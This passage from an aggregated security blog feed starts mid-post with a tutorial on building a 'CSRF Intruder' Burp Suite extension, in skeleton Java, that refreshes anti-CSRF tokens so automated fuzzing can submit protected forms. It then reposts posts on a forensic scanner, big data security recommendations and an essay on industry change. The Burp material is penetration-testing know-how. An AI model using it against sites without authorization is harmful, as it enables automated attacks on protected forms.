</pre>Because the <strong>OWASP_CSRFTOKEN</strong> parameter will change between every submission, the Intruder will not work, as it expects the application to respond to the request as if they came from the user. The solution is rather simple: instead of simply feeding a set of values to the parameters being tested, we need to have the Intruder populate the Anti-CSRF token parameter from the form page.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c322d0013970b-pi" style="display: inline;"><img alt="Intruder_regular" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c322d0013970b-800wi" title="Intruder_regular" /></a><br />
<br />
This changes the default behavior of the Intruder tool quite a bit. First, it must know which parameter represents the Anti-CSRF token in the request. While many frameworks will use parameter names that include the "csrf" string, this can be configured per application, and thus we cannot rely on automatic detection. Second, it means the Intruder must make twice the number of requests it would normally perform: one to fetch the form page, which contains the Anti-CSRF token embedded in it, and a second one to actually submit the form with the parameter values provided by the tester. We will address both issues by developing a Burp extension called <strong>CSRF Intruder</strong>.<br />
Burp offers an extensibility API, called <a href="http://www.portswigger.net/burp/extender/" title="Burp Extender">Burp Extender</a>, which allows us to hook into various points in the application, including the UI and the request interception engine. The first thing we need to do is create a Java class which will host our extension.<br />
<pre style="background: #ffffff; color: black;"><span style="color: maroon; font-weight: bold;">package</span><span style="color: #004a43;"> burp</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">import</span><span style="color: #004a43;"> spiderlabs</span><span style="color: #808030;">.</span><span style="color: #004a43;">burp</span><span style="color: #808030;">.</span><span style="color: #004a43;">intruder</span><span style="color: #808030;">.</span><span style="color: #004a43;">CSRFIntruder</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">public</span> <span style="color: maroon; font-weight: bold;">class</span> BurpExtender <span style="color: purple;">{</span>
<span style="color: maroon; font-weight: bold;">private</span> IBurpExtenderCallbacks callbacks<span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">private</span> CSRFIntruder csrfIntruder<span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">public</span> <span style="color: #bb7977;">void</span> registerExtenderCallbacks<span style="color: #808030;">(</span>IBurpExtenderCallbacks callbacks<span style="color: #808030;">)</span> <span style="color: purple;">{</span>
<span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks <span style="color: #808030;">=</span> callbacks<span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>csrfIntruder <span style="color: #808030;">=</span> <span style="color: maroon; font-weight: bold;">new</span> CSRFIntruder<span style="color: #808030;">(</span><span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>registerMenuItem<span style="color: #808030;">(</span><span style="color: #0000e6;">"CSRF Intruder"</span><span style="color: #808030;">,</span> <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>csrfIntruder<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>issueAlert<span style="color: #808030;">(</span><span style="color: #bb7977; font-weight: bold;">String</span><span style="color: #808030;">.</span>format<span style="color: #808030;">(</span><span style="color: #0000e6;">"Starting up CSRF Intruder extension [%s]"</span><span style="color: #808030;">,</span>
<span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>getClass<span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: #808030;">.</span>getCanonicalName<span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span>
<span style="color: maroon; font-weight: bold;">public</span> <span style="color: #bb7977;">void</span> processHttpMessage<span style="color: #808030;">(</span>java<span style="color: #808030;">.</span>lang<span style="color: #808030;">.</span><span style="color: #bb7977; font-weight: bold;">String</span> toolName<span style="color: #808030;">,</span> <span style="color: #bb7977;">boolean</span> messageIsRequest<span style="color: #808030;">,</span>
IHttpRequestResponse messageInfo<span style="color: #808030;">)</span> <span style="color: purple;">{</span>
<span style="color: dimgrey;">/* Intercept Intruder requests and check if they came from CSRF Intruder */</span>
<span style="color: maroon; font-weight: bold;">if</span> <span style="color: #808030;">(</span>toolName<span style="color: #808030;">.</span>equals<span style="color: #808030;">(</span><span style="color: #0000e6;">"intruder"</span><span style="color: #808030;">)</span> <span style="color: #808030;">&</span><span style="color: #808030;">&</span> messageIsRequest<span style="color: #808030;">)</span>
<span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>issueAlert<span style="color: #808030;">(</span><span style="color: #0000e6;">"TODO: Intercept CSRF Intruder requests"</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span>
<span style="color: purple;">}</span>
</pre>The <a href="http://www.portswigger.net/burp/extender/burp/IBurpExtender.html#registerExtenderCallbacks(burp.IBurpExtenderCallbacks)">registerExtenderCallbacks()</a> method acts as the extension constructor, and is the first method called by Burp when the extension is loaded. It provides us with a <a href="http://www.portswigger.net/burp/extender/burp/IBurpExtenderCallbacks.html">IBurpExtenderCallbacks</a> instance, which we use to create a new context menu entry for our CSRF Intruder handler. We also implement a <a href="http://www.portswigger.net/burp/extender/burp/IBurpExtender.html#processHttpMessage(java.lang.String,%20boolean,%20burp.IHttpRequestResponse)">processHttpMessage()</a> method, which we will use to intercept Intruder requests and modify the Anti-CSRF token velues before they are sent to the remote application.<br />
How does Burp use this class? It must obey a series of restrictions before Burp can find and use it:<br />
<ul><li>It must be in package <strong>burp</strong>;</li>
<li>It must be named <strong>BurpExtender</strong>;</li>
<li>It must implement at least one of the methods in interface <a href="http://www.portswigger.net/burp/extender/burp/IBurpExtender.html" title="IBurpExtender Interface">IBurpExtender</a>;</li>
<li>Burp must be executed with the JVM classpath pointing to our BurpExtender class:<br />
<br />
<pre>java -classpath burp.jar;BurpProxyExtender.jar burp.StartBurp</pre></li>
</ul>If these criteria are met, then when Burp starts up our CSRF Intruder extension message should show up in the Alerts tab.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee3d121bb970d-pi" style="display: inline;"><img alt="Burp_alerts" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017ee3d121bb970d-800wi" title="Burp_alerts" /></a><br />
We can now right-click everywhere where a "Send to [...]" menu entry is displayed and click on "CSRF Intruder".<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c5bc6fb970c-pi" style="display: inline;"><img alt="Csrf_intruder_context_menu" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017d3c5bc6fb970c-800wi" title="Csrf_intruder_context_menu" /></a><br />
Clicking on the CSRF Intruder menu entry will trigger the handler in our CSRFIntruder class, shown below:<br />
<pre style="background: #ffffff; color: black;"><span style="color: maroon; font-weight: bold;">package</span><span style="color: #004a43;"> spiderlabs</span><span style="color: #808030;">.</span><span style="color: #004a43;">burp</span><span style="color: #808030;">.</span><span style="color: #004a43;">intruder</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">import</span><span style="color: #004a43;"> javax</span><span style="color: #808030;">.</span><span style="color: #004a43;">swing</span><span style="color: #808030;">.</span><span style="color: #004a43;">JOptionPane</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">import</span><span style="color: #004a43;"> spiderlabs</span><span style="color: #808030;">.</span><span style="color: #004a43;">burp</span><span style="color: #808030;">.</span><span style="color: #004a43;">intruder</span><span style="color: #808030;">.</span><span style="color: #004a43;">gui</span><span style="color: #808030;">.</span><span style="color: #004a43;">CSRFConfigurationDialog</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">import</span><span style="color: #004a43;"> burp</span><span style="color: #808030;">.</span><span style="color: #004a43;">IBurpExtenderCallbacks</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">import</span><span style="color: #004a43;"> burp</span><span style="color: #808030;">.</span><span style="color: #004a43;">IHttpRequestResponse</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">import</span><span style="color: #004a43;"> burp</span><span style="color: #808030;">.</span><span style="color: #004a43;">IMenuItemHandler</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">public</span> <span style="color: maroon; font-weight: bold;">class</span> CSRFIntruder <span style="color: maroon; font-weight: bold;">implements</span> IMenuItemHandler <span style="color: purple;">{</span>
<span style="color: maroon; font-weight: bold;">private</span> IBurpExtenderCallbacks callbacks<span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">public</span> CSRFIntruder<span style="color: #808030;">(</span>IBurpExtenderCallbacks callbacks<span style="color: #808030;">)</span> <span style="color: purple;">{</span>
<span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks <span style="color: #808030;">=</span> callbacks<span style="color: purple;">;</span>
<span style="color: purple;">}</span>
<span style="color: #808030;">@</span>Override
<span style="color: maroon; font-weight: bold;">public</span> <span style="color: #bb7977;">void</span> menuItemClicked<span style="color: #808030;">(</span><span style="color: #bb7977; font-weight: bold;">String</span> caption<span style="color: #808030;">,</span> IHttpRequestResponse<span style="color: #808030;">[</span><span style="color: #808030;">]</span> messageInfo<span style="color: #808030;">)</span> <span style="color: purple;">{</span>
<span style="color: maroon; font-weight: bold;">try</span> <span style="color: purple;">{</span>
IHttpRequestResponse message <span style="color: #808030;">=</span> messageInfo<span style="color: #808030;">[</span><span style="color: #008c00;">0</span><span style="color: #808030;">]</span><span style="color: purple;">;</span>
<span style="color: #bb7977; font-weight: bold;">String</span> refererUrl <span style="color: #808030;">=</span> <span style="color: maroon; font-weight: bold;">new</span> <span style="color: #bb7977; font-weight: bold;">String</span><span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">for</span> <span style="color: #808030;">(</span><span style="color: #bb7977; font-weight: bold;">String</span> header<span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>getHeaders<span style="color: #808030;">(</span>message<span style="color: #808030;">.</span>getRequest<span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span> <span style="color: purple;">{</span>
<span style="color: #bb7977; font-weight: bold;">System</span><span style="color: #808030;">.</span>out<span style="color: #808030;">.</span>println<span style="color: #808030;">(</span>header<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">if</span> <span style="color: #808030;">(</span>header<span style="color: #808030;">.</span>startsWith<span style="color: #808030;">(</span><span style="color: #0000e6;">"Referer:"</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span>
refererUrl <span style="color: #808030;">=</span> header<span style="color: #808030;">.</span>split<span style="color: #808030;">(</span><span style="color: #0000e6;">":</span><span style="color: #0f69ff;">\\</span><span style="color: #0000e6;">s"</span><span style="color: #808030;">)</span><span style="color: #808030;">[</span><span style="color: #008c00;">1</span><span style="color: #808030;">]</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span>
<span style="color: #bb7977; font-weight: bold;">String</span> parameters<span style="color: #808030;">[</span><span style="color: #808030;">]</span><span style="color: #808030;">[</span><span style="color: #808030;">]</span> <span style="color: #808030;">=</span> <span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>getParameters<span style="color: #808030;">(</span>message<span style="color: #808030;">.</span>getRequest<span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
CSRFIntruderConfiguration configuration <span style="color: #808030;">=</span>
CSRFConfigurationDialog<span style="color: #808030;">.</span>getConfigurationFromDialog<span style="color: #808030;">(</span>refererUrl<span style="color: #808030;">,</span> parameters<span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>issueAlert<span style="color: #808030;">(</span>configuration<span style="color: #808030;">.</span>toString<span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span> <span style="color: maroon; font-weight: bold;">catch</span> <span style="color: #808030;">(</span><span style="color: #bb7977; font-weight: bold;">Exception</span> exception<span style="color: #808030;">)</span> <span style="color: purple;">{</span>
<span style="color: maroon; font-weight: bold;">this</span><span style="color: #808030;">.</span>callbacks<span style="color: #808030;">.</span>issueAlert<span style="color: #808030;">(</span><span style="color: #bb7977; font-weight: bold;">String</span><span style="color: #808030;">.</span>format<span style="color: #808030;">(</span><span style="color: #0000e6;">"Error while obtaining request URL: %s"</span><span style="color: #808030;">,</span>
exception<span style="color: #808030;">.</span>toString<span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span>
<span style="color: purple;">}</span>
<span style="color: purple;">}</span>
</pre>The menuItemClicked() handler does two things: first, it fetches the value of the Referer header (if present) from the request the user right-clicked on and uses it as the suggested source form URL, that is, the place where we can find the Anti-CSRF token values; next, it obtain a list of all parameters in that request. It then sends those to a CSRFConfigurationDialog, which displays the URL and parameters, and waits for the user to configure the Anti-CSRF parameters.<br />
<a href="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c322dab3a970b-pi" style="display: inline;"><img alt="Csrf_intruder_configuration" border="0" src="http://npercoco.typepad.com/.a/6a0133f264aa62970b017c322dab3a970b-800wi" title="Csrf_intruder_configuration" /></a><br />
When the user provides the URL and the token parameter to be used, we already have all the information necessary to start up Intruder and manipulate its requests. This will come on a second post.</div><div><a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=FlD9q38Wr94:GwvUTrkvZ5w:yIl2AUoC8zA"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=yIl2AUoC8zA" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=FlD9q38Wr94:GwvUTrkvZ5w:qj6IDK7rITs"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=qj6IDK7rITs" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=FlD9q38Wr94:GwvUTrkvZ5w:V_sGLiPBpWU"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?i=FlD9q38Wr94:GwvUTrkvZ5w:V_sGLiPBpWU" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=FlD9q38Wr94:GwvUTrkvZ5w:gIN9vFwOqvQ"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?i=FlD9q38Wr94:GwvUTrkvZ5w:gIN9vFwOqvQ" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=FlD9q38Wr94:GwvUTrkvZ5w:TzevzKxY174"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=TzevzKxY174" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=FlD9q38Wr94:GwvUTrkvZ5w:l6gmwiTKsz0"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?d=l6gmwiTKsz0" /></a> <a href="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?a=FlD9q38Wr94:GwvUTrkvZ5w:F7zBnMyn0Lo"><img border="0" src="http://feeds.feedburner.com/~ff/SpiderlabsAnterior?i=FlD9q38Wr94:GwvUTrkvZ5w:F7zBnMyn0Lo" /></a></div><img height="1" src="http://feeds.feedburner.com/~r/SpiderlabsAnterior/~4/FlD9q38Wr94" width="1" />Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-69801877388114095082012-10-05T05:40:00.001-07:002012-10-05T05:40:40.260-07:00Forensic Scanner<a href="http://windowsir.blogspot.com/2012/10/forensic-scanner.html">Forensic Scanner</a>: I've posted regarding my thoughts on a <a href="http://windowsir.blogspot.com/2011/10/forensic-scanner.html">Forensic Scanner</a> before, and just today, I gave a short presentation at the <a href="http://www.basistech.com/about-us/events/open-source-forensics-conference/">#OSDFC conference</a> on the subject. <br />
<br />
Rather than describing the scanner, this time around, I <a href="http://code.google.com/p/forensicscanner/downloads/list">released</a> it. The archive contains the Perl source code, a 'compiled' executable that you can run on Windows without installing Perl, a directory of plugins, and PDF document describing how to use the tool. I've also started populating the <a href="http://code.google.com/p/forensicscanner/wiki/Home?tm=6">wiki</a> with information about the tool, and how it's used.<br />
<br />
Some of the feedback I received on the presentation was pretty positive. I did chat with <a href="http://simson.net/page/Main_Page">Simson Garfinkel </a>for a few minutes after the presentation, and he had some interesting thoughts to share. The second was on making the Forensic Scanner thread-safe, so it can be multi-threaded and use multiple cores. That might make it on to the "To-Do" list, but it was Simson's first thought that I wanted to address. He suggested that at a conference were the theme seemed to revolve around analysis frameworks, I should point out the differences between the other frameworks and what I was presenting on, so I wanted to take a moment to do that.<br />
<br />
Brian presented on <a href="http://www.sleuthkit.org/autopsy/desc3.php">Autopsy 3.0</a>, and along with another presentation in the morning, discussed some of the features of the framework. There was the discussion of pipelines, and having modules to perform specific functions, etc. It's an excellent framework that has the capability of performing functions such as parsing Registry hives (utilizing RegRipper), carving files from unallocated space, etc. For more details, please see the web site. <br />
<br />
I should note that there are other open source frameworks available, as well, such as <a href="http://www.digital-forensic.org/">DFF</a>. <br />
<br />
The Forensic Scanner is...different. Neither better, nor worse...because it addresses a different problem. For example, you wouldn't use the Forensic Scanner to run a keyword search or carve unallocated space. The scanner is intended for quickly automating repetitive tasks of data collection, with some ability to either point the analyst in a particular direction, or perform a modicum of analysis along with the data presentation (depending upon how much effort you want to put into writing the plugins). So, rather than providing an open framework which an analyst can use to perform various analysis functions, the Scanner allows the analyst to perform discrete, repetitive tasks.<br />
<br />
The idea behind the scanner is this...there're things we do all the time when we first initiate our analysis. One is to collect simple information from the system...it's a Windows system, which version of Windows is it, it's time zone settings, is it 32- or 64-bit, etc. We collect this information because it can significantly impact our analysis. However, keeping track of all of these things can be difficult. For example, if you're looking at an image acquired from a Windows system and don't see Prefetch files, what's your first thought? Do you check the version of Windows you're examining? Do you check the Registry values that apply to and control the system's prefetching capabilities? I've talked with examiners who's first thought is that the user must have deleted the Prefetch files...but how do you know? <br />
<br />
Rather than maintaining extensive checklists of all of these artifacts, why not simply write a plugin to collect what data it is that you want to collect, and possibly add a modicum of analysis into that plugin? One analyst writes the plugin, shares it, and anyone with that plugin will have access to the functionality without having to have had the same experiences as the analyst. You share it with all of your analysts, and they all have the capability at their fingertips. Most analysts recognize the value of the Prefetch files, but some may not work with Windows systems all of the time, and may not stay up on the "latest and greatest" in <a href="http://windowsir.blogspot.com/2012/03/prefetch-analysis-revisited.html">analysis techniques </a>that can be applied to those files. So, let's say that instead of dumping all of the module paths embedded in Prefetch files, you add some logic to search for .exe files, .dat files, and any file that includes "temp" in the path, and display that information? Or, why not create whitelists of modules over time, and have the plugin show you all modules not in that whitelist?<br />
<br />
Something that I and others have found useful is that, instead of forcing the analyst to use "profiles", as with the current version of RegRipper, the Forensic Scanner runs plugins automatically based on OS type, class, and then organizes the plugin results by category. What this means is that for the system class of plugins, all of the plugins that pertain to "Program Execution" will be grouped together; this holds true for other plugin categories, as well. This way, you don't have to go searching around for the information in which you're interested.<br />
<br />
As I stated more than once in the presentation, the Scanner is not intended to <i>replace</i> analysis; rather, it's intended to get you to the point of performing analysis much sooner. For example, I illustrated a plugin that parses a user's IE index.dat file. Under normal circumstances when performing analysis, you'd have to determine which version of Windows you were examining, determine the path to the particular index.dat file that you're interested in, and then extract it and parse it. The plugin is capable of doing all of that...in the test case, <i>all</i> of the plugins I ran against a mounted volume completed in under 2 seconds...that's scans of the system, as well as both of the selected user profiles.<br />
<br />
So...please feel free to try the Scanner. If you have any questions, you know where to <a href="mailto:keydet89@yahoo.com">reach me</a>. Just know that this is a work-in-progress, with room for growth.<br />
<br />
<b><i>Addendum</i></b><br />
Matt Presser identified an issue that the Scanner has with identifying user profiles that contain a dot. I fixed the issue and will be releasing an update once I make a couple of minor updates to other parts of the code.<br />
<div><img alt="" height="1" src="https://blogger.googleusercontent.com/tracker/9518042-8888687740343272993?l=windowsir.blogspot.com" width="1" /></div>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-85202476226742765132012-10-03T07:25:00.001-07:002012-10-03T07:25:55.441-07:00Securing Big Data: Recommendations and Open Issues<a href="https://securosis.com/blog/securing-big-data-recommendations-and-open-issues">Securing Big Data: Recommendations and Open Issues</a>: <br />
Our previous two posts outlined several security issues inherent to big data <a href="https://securosis.com/blog/securing-big-data-operational-security-issues">architecture</a>, and <a href="https://securosis.com/blog/securing-big-data-architectural-issues">operational security issues</a> common to big data clusters. With those in mind, how can one go about securing a big data cluster? What tools and techniques should you employ?<br />
<br />
Before we can answer those questions we need some ground rules, because not all ‘solutions’ are created equally. Many vendors claim to offer big data security, but they are really just selling the same products they offer for other back office systems and relational databases. Those products might work in a big data cluster, but only by compromising the big data model to make it fit the restricted envelope of what they can support. Their constraints on scalability, coverage, management, and deployment are all at odds with the essential big data features we have discussed. Any security product for big data needs a few characteristics:<br />
<br />
<ol><li>It must not compromise the basic functionality of the cluster</li>
<li>It should scale in the same manner as the cluster</li>
<li>It should not compromise the essential characteristics of big data</li>
<li>It should address – or at least mitigate – a security threat to big data environments or data stored within the cluster.</li>
</ol><br />
So how can we secure big data repositories today? The following is a list of common challenges, with security measures to address them:<br />
<br />
<ul><li><strong>User access:</strong> We use identity and access management systems to control users, including both regular and administrator access.</li>
<li><strong>Separation of duties:</strong> We use a combination of authentication, authorization, and encryption to provide separation of duties between administrative personnel. We use application space, namespace, or schemata to logically segregate user access to a subset of the data under management.</li>
<li><strong>Indirect access:</strong> To close “back doors” – access to data <em>outside</em> permitted interfaces – we use a combination of encryption, access control, and configuration management.</li>
<li><strong>User activity:</strong> We use logging and user activity monitoring (where available) to alert on suspicious activity and enable forensic analysis.</li>
<li><strong>Data protection:</strong> Removal of sensitive information <em>prior</em> to insertion and data masking (via tools) are common strategies for reducing risk. But the majority of big data clusters we are aware of <em>already</em> store redundant copies of sensitive data. This means the data stored on disk must be protected against unauthorized access, and data encryption is the <em>de facto</em> method of protecting sensitive data at rest. In keeping with the requirements above, any encryption solution must scale with the cluster, must not interfere with MapReduce capabilities, and must not store keys on hard drives along with the encrypted data – keys must be handled by a secure key manager.</li>
<li><strong>Eavesdropping:</strong> We use SSL and TLS encryption to protect network communications. Hadoop offers SSL, but its implementation is limited to client connections. Cloudera offers good integration of TLS; otherwise look for third party products to close this gap.</li>
<li><strong>Name and data node protection:</strong> By default Hadoop HTTP web consoles (JobTracker, NameNode, TaskTrackers, and DataNodes) allow access without any form of authentication. The good news is that Hadoop RPC and HTTP web consoles can be configured to require Kerberos authentication. Bi-directional authentication of nodes is built into Hadoop, and available in some other big data environments as well. Hadoop’s model is built on Kerberos to authenticate applications to nodes, nodes to applications, and client requests for MapReduce and similar functions. Care must be taken to secure granting and storage of Kerberos tickets, but this is a <em>very</em> effective method for controlling what nodes and applications can participate on the cluster.</li>
<li><strong>Application protection:</strong> Big data clusters are built on web-enabled platforms – which means that remote injection, cross-site scripting, buffer overflows, and logic attacks against and through client applications are all possible avenues of attack for access to the cluster. Countermeasures typically include a mixture of secure code development practices (such as input validation, and address space randomization), network segmentation, and third-party tools (including Web Application Firewalls, IDS, authentication, and authorization). Some platforms offer built-in features to bolster application protection, such as YARN’s web application proxy service.</li>
<li><strong>Archive protection:</strong> As backups are largely an intractable problem for big data, we don’t need to worry much about traditional backup/archive security. But just because legitimate users cannot perform conventional backups does not mean an <em>attacker</em> would not create at least a partial backup. We need to secure the management plane to keep unwanted copies of data or data nodes from being propagated. Access controls, and possibly network segregation, are effective countermeasures against attackers trying to gain administrative access, and encryption can help protect data in case other protections are defeated.</li>
</ul><br />
In the end, our big data security recommendations boil down to a handful of standard tools which can be effective in setting a secure baseline for big data environments:<br />
<br />
<ol><li><strong>Use Kerberos:</strong> This is effective method for keeping rogue nodes and applications off your cluster. And it can help protect web console access, making administrative functions harder to compromise. We know Kerberos is a pain to set up, and (re-)validation of new nodes and applications takes work. But without bi-directional trust establishment it is too easy to fool Hadoop into letting malicious applications into the cluster, or into accepting introduce malicious nodes – which can then add, alter, or extract data. Kerberos is one of the most effective security controls at your disposal, and it’s built into the Hadoop infrastructure, so use it.</li>
<li><strong>File layer encryption:</strong> File encryption addresses two attacker methods for circumventing normal application security controls. Encryption protects in case malicious users or administrators gain access to data nodes and directly inspect files, and it also renders stolen files or disk images unreadable. Encryption protects against two of the most serious threats. Just as importantly, it meets our requirements for big data security tools – it is transparent to both Hadoop and calling applications, and scales out as the cluster grows. Open source products are available for most Linux systems; commercial products additionally offer external key management, trusted binaries, and full support. This is a cost-effective way to address several data security threats.</li>
<li><strong>Management:</strong> Deployment consistency is difficult to ensure in a multi-node environment. Patching, application configuration, updating the Hadoop stack, collecting trusted machine images, certificates, and platform discrepancies, all contribute to what can easily become a management nightmare. The good news is that most of you will be deploying in cloud and virtual environments. You can leverage tools from your cloud provider, hypervisor vendor, and third parties (such as Chef and Puppet) to automate pre-deployment tasks. Machine images, patches, and configuration should be fully automated and updated prior to deployment. You can even run validation tests, collect encryption keys, and request access tokens before nodes are accessible to the cluster. Building the scripts takes some time up front but pays for itself in reduced management time later, and additionally ensures that each node comes up with baseline security in place.</li>
<li><strong>Log it!:</strong> Big data is a natural fit for collecting and managing log data. Many web companies started with big data specifically to manage log files. Why not add logging onto your existing cluster? It gives you a place to look when something fails, or if someone thinks perhaps you have been hacked. Without an event trace you are blind. Logging MR requests and other cluster activity is easy to do, and increases storage and processing demands by a small fraction, but the data is indispensable when you need it.</li>
<li><strong>Secure communication:</strong> Implement secure communication between nodes, and between nodes and applications. This requires an SSL/TLS implementation that actually protects all network communications rather than just a subset. Cloudera appears to get this right, and some cloud providers offer secure communication options as well; otherwise you will likely need to integrate these services into your application stack.</li>
</ol><br />
When we speak with big data architects and managers, we hear their most popular security model is to hide the cluster within their infrastructure, where attackers don’t notice it. But these repositories are now common, and lax security makes them a very attractive target. Consider the recommendations above a minimum for preventative security. And these are the <em>easy</em> security measures – they are simple, cost-effective, and scalable, and they addresses specific security deficiencies with big data clusters. Nothing suggested here impairs performance, scalability, or functionality. Yes, it’s more work to set up, but relatively simple to manage and maintain.<br />
<br />
Several other threats are less easily addressed. API security, monitoring, user authentication, granular data access, and gating MapReduce requests, are all issues without simple answers. In some cases, such as with application security, there are simply too many variables – with security controls requiring tradeoffs that are entirely dependent upon the particular environment. Some controls, including certain types of encryption and activity monitoring, require modifications to deployments or data choke points that can slow data input to a snail’s pace. In many cases we have nothing to recommend – technologies have not yet evolved sufficiently to handle real-world big data requirements. That does not mean you cannot fill the gaps with your own solutions. But for some problems, there are no simple solutions. Our recommendation can greatly improve overall security of big data clusters, and we highlight outstanding operational and architectural security issues to help you develop your own security measures.<br />
<br />
This concludes our short introduction to big data security. As always, please comment if you feel we missed something or feel we have gotten anything wrong. Big data security is both complex and rapidly changing; we know there are many different perspectives and encourage you to share yours.<br />
<br />
- Adrian Lane<br />
(0) <a href="https://securosis.com/blog/securing-big-data-recommendations-and-open-issues">Comments</a>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-91271409508039324062012-09-25T13:15:00.001-07:002012-09-25T13:15:34.843-07:00Inflection<a href="https://securosis.com/blog/inflection">Inflection</a>: <br />
Hang with me as I channel my inner Kerouac (minus the drugs, plus the page breaks) and go all stream of consciousness. To call this post an “incomplete thought” would be more than a little generous.<br />
<br />
I believe we are now deep in the early edge of a major inflection point in security. Not one based merely on evolving threats or new compliance regimes, but a fundamental transformation of the practice of security that will make it nearly unrecognizable when we finally emerge on the other side. For the past 5 years Hoff and I have discussed <em>disruptive innovation</em> in our annual RSA presentation. What we are seeing now is a <em>disruptive conflagration,</em> where multiple disruptive innovations are colliding and overlapping. It affects more than security, but that’s the only area about which I’m remotely qualified to pontificate.<br />
<br />
Perhaps that’s a bit of an exaggeration. All the core elements of what we will become are here today, and there are certain fundamentals that never change, but someone walking into the SOC or CISO role of tomorrow will find more different than the same unless they deliberately blind themselves.<br />
<br />
Unlike most of what I read out there, I don’t see these changes as merely things we in security are forced to react to. Our internal changes in practice and technology are every bit as significant contributing factors.<br />
<br />
One of the highlights of my career was once hanging out and having beers with Bruce Sterling. He said that his role as a futurist was to imagine the world 7 years out – effectively beyond the event horizon of predictability. What I am about to describe will occur over the next 5-10 years, with the most significant changes likely occurring in those last 7-10 years, but based on the roots we establish today. So this should be taken as much as science fiction as prediction.<br />
<br />
The last half of 2012 is the first 6 months of this transition. The end result, in 2022, will be far more change over 10 years than the evolution of the practice of security from 2002 through today.<br />
<br />
<hr /><br />
The first major set of disruptions includes the binary supernova of tech – cloud computing and mobility. This combination, in my mind, is more fundamentally disruptive than the initial emergence of the Internet. Think about it – for the most part the Internet was (at a technical level) merely an extension of our existing infrastructure. To this day we have tons of web applications that, through a variety of tiers, connect back to 30+-year-old mainframe applications. Consumption is still mostly tied to people sitting at computers at desks – especially conceptually.<br />
<br />
Cloud blows up the idea of merely extending existing architectures with a web portal, while mobility advances fundamentally redefine consumption of technology. Can you merely slop your plate of COBOL onto a plate of cloud? Certainly, right as you watch your competitors and customers speed past at relativistic speeds.<br />
<br />
